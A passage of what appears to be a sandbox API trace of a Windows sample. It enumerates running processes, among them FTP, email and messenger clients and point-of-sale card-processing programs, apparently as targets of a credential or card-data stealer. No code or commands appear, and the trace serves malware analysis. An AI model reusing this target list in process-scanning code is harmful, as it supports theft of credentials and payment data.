th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0232.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0232.971] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0232.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0232.974] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0232.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0232.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0232.980] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0232.982] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0232.984] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0232.986] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0232.988] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0232.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0232.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0233.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0233.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0233.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0233.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0233.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0233.100] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0233.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0233.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0233.105] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0233.107] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0233.109] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0233.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0233.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0233.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0233.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.119] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.120] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.122] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.123] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.125] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.126] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0233.128] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0233.129] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0233.131] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0233.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0233.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0233.135] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0233.206] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0233.208] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0233.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0233.211] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0233.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0233.214] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0233.216] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0233.217] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0233.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.220] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0233.224] CloseHandle (hObject=0x1018) returned 1 [0233.224] Sleep (dwMilliseconds=0x64) [0233.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0233.366] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.367] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.369] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.433] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.435] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.437] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.438] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.439] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.441] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.442] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.444] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.445] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.446] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.448] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.450] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.451] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.452] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.454] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.455] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.458] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0233.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0233.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.462] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.501] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0233.503] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0233.504] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0233.506] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0233.507] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.510] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.511] Process32Next (in: hSnapshot=0x1b08, 